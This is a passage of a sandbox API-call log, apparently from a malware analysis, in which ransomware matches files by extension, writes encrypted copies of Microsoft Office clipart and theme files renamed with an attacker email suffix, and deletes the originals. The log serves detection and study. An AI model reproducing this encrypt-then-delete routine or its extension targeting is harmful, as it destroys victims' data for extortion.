(lpString=".bz2") returned 4 [0269.252] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0269.252] lstrlenW (lpString=".7z") returned 3 [0269.252] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0269.252] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\VCTRN_01.MID") returned 63 [0269.252] lstrlenW (lpString=".dbf") returned 4 [0269.252] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0269.252] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\VCTRN_01.MID") returned 63 [0269.252] lstrlenW (lpString=".1cd") returned 4 [0269.252] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0269.252] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\VCTRN_01.MID") returned 63 [0269.252] lstrlenW (lpString=".jpg") returned 4 [0269.252] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0269.253] lstrcmpiW (lpString1=".MID", lpString2=".USA") returned -1 [0269.253] lstrlenW (lpString="WNTER_01.MID") returned 12 [0269.253] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WNTER_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wnter_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0269.269] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=6915) returned 1 [0269.269] CloseHandle (hObject=0x384) returned 1 [0269.269] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WNTER_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wnter_01.mid")) returned 0x20 [0269.273] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WNTER_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wnter_01.mid.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0269.283] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WNTER_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wnter_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0269.283] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.283] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.283] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WNTER_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wnter_01.mid.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0269.321] GetLastError () returned 0x0 [0269.321] ReadFile (in: hFile=0x390, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x1b03, lpOverlapped=0x0) returned 1 [0269.349] WriteFile (in: hFile=0x348, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0x1b10, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0x1b10, lpOverlapped=0x0) returned 1 [0269.350] ReadFile (in: hFile=0x390, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x0, lpOverlapped=0x0) returned 1 [0269.350] WriteFile (in: hFile=0x348, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0xec, lpOverlapped=0x0) returned 1 [0269.350] SetEndOfFile (hFile=0x348) returned 1 [0269.350] CloseHandle (hObject=0x348) returned 1 [0269.350] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.350] SetEndOfFile (hFile=0x390) returned 1 [0269.392] CloseHandle (hObject=0x390) returned 1 [0269.392] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WNTER_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0269.451] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WNTER_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wnter_01.mid")) returned 1 [0269.452] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WNTER_01.MID") returned 63 [0269.452] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WNTER_01.MID") returned 63 [0269.452] lstrlenW (lpString=".doc") returned 4 [0269.452] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0269.452] lstrlenW (lpString=".docx") returned 5 [0269.452] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0269.452] lstrlenW (lpString=".pdf") returned 4 [0269.452] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0269.452] lstrlenW (lpString=".xls") returned 4 [0269.452] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0269.452] lstrlenW (lpString=".xlsx") returned 5 [0269.452] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0269.452] lstrlenW (lpString=".ppt") returned 4 [0269.452] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0269.452] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WNTER_01.MID") returned 63 [0269.452] lstrlenW (lpString=".zip") returned 4 [0269.452] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0269.452] lstrlenW (lpString=".rar") returned 4 [0269.452] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0269.452] lstrlenW (lpString=".bz2") returned 4 [0269.452] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0269.452] lstrlenW (lpString=".7z") returned 3 [0269.452] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0269.452] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WNTER_01.MID") returned 63 [0269.452] lstrlenW (lpString=".dbf") returned 4 [0269.452] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0269.452] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WNTER_01.MID") returned 63 [0269.452] lstrlenW (lpString=".1cd") returned 4 [0269.452] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0269.452] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WNTER_01.MID") returned 63 [0269.452] lstrlenW (lpString=".jpg") returned 4 [0269.453] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0269.453] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WNTER_01.MID") returned 63 [0269.453] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WNTER_01.MID") returned 63 [0269.453] lstrlenW (lpString=".doc") returned 4 [0269.453] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0269.453] lstrlenW (lpString=".docx") returned 5 [0269.453] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0269.453] lstrlenW (lpString=".pdf") returned 4 [0269.453] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0269.453] lstrlenW (lpString=".xls") returned 4 [0269.453] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0269.453] lstrlenW (lpString=".xlsx") returned 5 [0269.453] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0269.453] lstrlenW (lpString=".ppt") returned 4 [0269.453] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0269.453] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WNTER_01.MID") returned 63 [0269.453] lstrlenW (lpString=".zip") returned 4 [0269.453] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0269.454] lstrlenW (lpString=".rar") returned 4 [0269.454] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0269.454] lstrlenW (lpString=".bz2") returned 4 [0269.454] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0269.454] lstrlenW (lpString=".7z") returned 3 [0269.454] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0269.454] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WNTER_01.MID") returned 63 [0269.454] lstrlenW (lpString=".dbf") returned 4 [0269.454] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0269.454] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WNTER_01.MID") returned 63 [0269.454] lstrlenW (lpString=".1cd") returned 4 [0269.454] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0269.454] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WNTER_01.MID") returned 63 [0269.454] lstrlenW (lpString=".jpg") returned 4 [0269.454] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0269.454] lstrcmpiW (lpString1=".eftx", lpString2=".USA") returned -1 [0269.454] lstrlenW (lpString="Austin.eftx") returned 11 [0269.454] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Austin.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\austin.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0269.490] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=26989) returned 1 [0269.490] CloseHandle (hObject=0x3b4) returned 1 [0269.490] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Austin.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\austin.eftx")) returned 0x20 [0269.490] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Austin.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\austin.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0269.490] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Austin.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\austin.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0269.490] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.490] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.490] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Austin.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\austin.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0269.828] GetLastError () returned 0x0 [0269.828] ReadFile (in: hFile=0x3b4, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x696d, lpOverlapped=0x0) returned 1 [0269.830] WriteFile (in: hFile=0x388, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0x6970, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0x6970, lpOverlapped=0x0) returned 1 [0269.831] ReadFile (in: hFile=0x3b4, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x0, lpOverlapped=0x0) returned 1 [0269.831] WriteFile (in: hFile=0x388, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0xea, lpOverlapped=0x0) returned 1 [0269.831] SetEndOfFile (hFile=0x388) returned 1 [0269.831] CloseHandle (hObject=0x388) returned 1 [0269.831] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.831] SetEndOfFile (hFile=0x3b4) returned 1 [0269.833] CloseHandle (hObject=0x3b4) returned 1 [0269.834] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Austin.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0269.882] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Austin.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\austin.eftx")) returned 1 [0269.882] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Austin.eftx") returned 78 [0269.882] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Austin.eftx") returned 78 [0269.882] lstrlenW (lpString=".doc") returned 4 [0269.882] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0269.882] lstrlenW (lpString=".docx") returned 5 [0269.882] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0269.882] lstrlenW (lpString=".pdf") returned 4 [0269.882] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0269.882] lstrlenW (lpString=".xls") returned 4 [0269.882] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0269.882] lstrlenW (lpString=".xlsx") returned 5 [0269.882] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0269.883] lstrlenW (lpString=".ppt") returned 4 [0269.883] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0269.883] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Austin.eftx") returned 78 [0269.883] lstrlenW (lpString=".zip") returned 4 [0269.883] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0269.883] lstrlenW (lpString=".rar") returned 4 [0269.883] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0269.883] lstrlenW (lpString=".bz2") returned 4 [0269.883] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0269.883] lstrlenW (lpString=".7z") returned 3 [0269.883] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0269.883] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Austin.eftx") returned 78 [0269.883] lstrlenW (lpString=".dbf") returned 4 [0269.883] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0269.883] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Austin.eftx") returned 78 [0269.883] lstrlenW (lpString=".1cd") returned 4 [0269.883] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0269.883] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Austin.eftx") returned 78 [0269.883] lstrlenW (lpString=".jpg") returned 4 [0269.883] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0269.883] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Austin.eftx") returned 78 [0269.883] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Austin.eftx") returned 78 [0269.883] lstrlenW (lpString=".doc") returned 4 [0269.883] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0269.883] lstrlenW (lpString=".docx") returned 5 [0269.883] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0269.883] lstrlenW (lpString=".pdf") returned 4 [0269.883] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0269.883] lstrlenW (lpString=".xls") returned 4 [0269.884] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0269.884] lstrlenW (lpString=".xlsx") returned 5 [0269.884] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0269.884] lstrlenW (lpString=".ppt") returned 4 [0269.884] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0269.884] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Austin.eftx") returned 78 [0269.884] lstrlenW (lpString=".zip") returned 4 [0269.884] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0269.884] lstrlenW (lpString=".rar") returned 4 [0269.884] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0269.884] lstrlenW (lpString=".bz2") returned 4 [0269.884] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0269.884] lstrlenW (lpString=".7z") returned 3 [0269.884] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0269.884] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Austin.eftx") returned 78 [0269.884] lstrlenW (lpString=".dbf") returned 4 [0269.884] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0269.884] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Austin.eftx") returned 78 [0269.884] lstrlenW (lpString=".1cd") returned 4 [0269.885] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0269.885] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Austin.eftx") returned 78 [0269.885] lstrlenW (lpString=".jpg") returned 4 [0269.885] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0269.885] lstrcmpiW (lpString1=".eftx", lpString2=".USA") returned -1 [0269.885] lstrlenW (lpString="Clarity.eftx") returned 12 [0269.885] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\clarity.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0269.886] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=32818) returned 1 [0269.886] CloseHandle (hObject=0x3ac) returned 1 [0269.886] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\clarity.eftx")) returned 0x20 [0269.886] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\clarity.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0269.886] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\clarity.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0269.886] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.886] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.886] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\clarity.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0269.887] GetLastError () returned 0x0 [0269.887] ReadFile (in: hFile=0x3ac, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x8032, lpOverlapped=0x0) returned 1 [0269.889] WriteFile (in: hFile=0x3b0, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0x8040, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0x8040, lpOverlapped=0x0) returned 1 [0269.891] ReadFile (in: hFile=0x3ac, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x0, lpOverlapped=0x0) returned 1 [0269.891] WriteFile (in: hFile=0x3b0, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0xec, lpOverlapped=0x0) returned 1 [0269.891] SetEndOfFile (hFile=0x3b0) returned 1 [0269.891] CloseHandle (hObject=0x3b0) returned 1 [0269.891] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.891] SetEndOfFile (hFile=0x3ac) returned 1 [0269.894] CloseHandle (hObject=0x3ac) returned 1 [0269.895] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0269.895] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\clarity.eftx")) returned 1 [0269.895] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx") returned 79 [0269.895] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx") returned 79 [0269.895] lstrlenW (lpString=".doc") returned 4 [0269.895] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0269.895] lstrlenW (lpString=".docx") returned 5 [0269.895] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0269.895] lstrlenW (lpString=".pdf") returned 4 [0269.895] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0269.895] lstrlenW (lpString=".xls") returned 4 [0269.895] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0269.895] lstrlenW (lpString=".xlsx") returned 5 [0269.895] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0269.895] lstrlenW (lpString=".ppt") returned 4 [0269.895] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0269.895] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx") returned 79 [0269.895] lstrlenW (lpString=".zip") returned 4 [0269.895] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0269.895] lstrlenW (lpString=".rar") returned 4 [0269.895] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0269.896] lstrlenW (lpString=".bz2") returned 4 [0269.896] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0269.896] lstrlenW (lpString=".7z") returned 3 [0269.896] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0269.896] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx") returned 79 [0269.896] lstrlenW (lpString=".dbf") returned 4 [0269.896] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0269.896] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx") returned 79 [0269.896] lstrlenW (lpString=".1cd") returned 4 [0269.896] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0269.896] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx") returned 79 [0269.896] lstrlenW (lpString=".jpg") returned 4 [0269.896] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0269.896] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx") returned 79 [0269.896] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx") returned 79 [0269.896] lstrlenW (lpString=".doc") returned 4 [0269.896] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0269.896] lstrlenW (lpString=".docx") returned 5 [0269.896] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0269.896] lstrlenW (lpString=".pdf") returned 4 [0269.896] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0269.896] lstrlenW (lpString=".xls") returned 4 [0269.896] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0269.896] lstrlenW (lpString=".xlsx") returned 5 [0269.896] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0269.896] lstrlenW (lpString=".ppt") returned 4 [0269.896] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0269.896] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx") returned 79 [0269.897] lstrlenW (lpString=".zip") returned 4 [0269.897] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0269.897] lstrlenW (lpString=".rar") returned 4 [0269.897] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0269.897] lstrlenW (lpString=".bz2") returned 4 [0269.897] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0269.897] lstrlenW (lpString=".7z") returned 3 [0269.897] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0269.897] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx") returned 79 [0269.897] lstrlenW (lpString=".dbf") returned 4 [0269.897] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0269.897] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx") returned 79 [0269.897] lstrlenW (lpString=".1cd") returned 4 [0269.897] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0269.897] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx") returned 79 [0269.897] lstrlenW (lpString=".jpg") returned 4 [0269.897] lstrcmpiW (lpString1=".jpg", 